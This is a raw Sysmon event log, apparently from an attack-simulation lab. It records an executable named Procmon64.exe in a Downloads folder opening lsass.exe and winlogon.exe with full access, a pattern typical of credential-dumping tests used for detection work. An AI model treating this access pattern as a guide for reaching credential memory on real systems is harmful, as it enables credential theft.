10:55:39.389{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53546-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 10341000x8000000000000000289646Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:41.252{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289645Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:41.252{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289644Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:41.252{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289643Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:41.236{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289642Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:41.236{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289641Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:41.236{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289640Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:41.236{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217460Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:42.379{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3713B35CA7999A07E02A65DB7778D8C2,SHA256=C158E10933AC69EB7B3AB78F1C1EEE1A11FE96B735524172744BF58022B32685,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289651Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:42.983{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289650Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:42.983{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289649Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:42.052{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3508D9B56F2A5ADF3BB6ADACADF6221A,SHA256=224FA2AD741E96C6541F8709DF11AED8F3A485DB4929517CB8D12E11C892CDBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217462Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:43.395{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC396C1E4BAA7B6B6FF453167F6B4F1D,SHA256=B1678020DFA91A85E82FAAB2169CF0DF633176DED0AC5D1FF34C15CA321D41B5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289657Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:43.940{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-0C00-000000003802}828C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289656Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:43.937{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11C-6215-0900-000000003802}568C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289655Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:43.887{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11C-6215-0900-000000003802}568C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289654Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:43.400{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289653Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:43.168{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289652Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:43.083{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDB82D89E3A2B1E6D7E8B4422B95F615,SHA256=A8C3A77F9BD9BB13E59411EBABFD4BA39867B24AD96571DCD3A4AA19287031AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217461Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:40.560{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51398-false10.0.1.12-8000- 10341000x8000000000000000217476Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:44.863{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-12B0-6216-7A04-000000003902}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217475Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:44.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217474Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:44.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217473Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:44.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217472Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:44.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217471Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:44.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217470Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:44.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217469Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:44.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217468Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:44.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217467Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:44.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217466Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:44.863{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-12B0-6216-7A04-000000003902}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217465Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:44.863{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-12B0-6216-7A04-000000003902}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 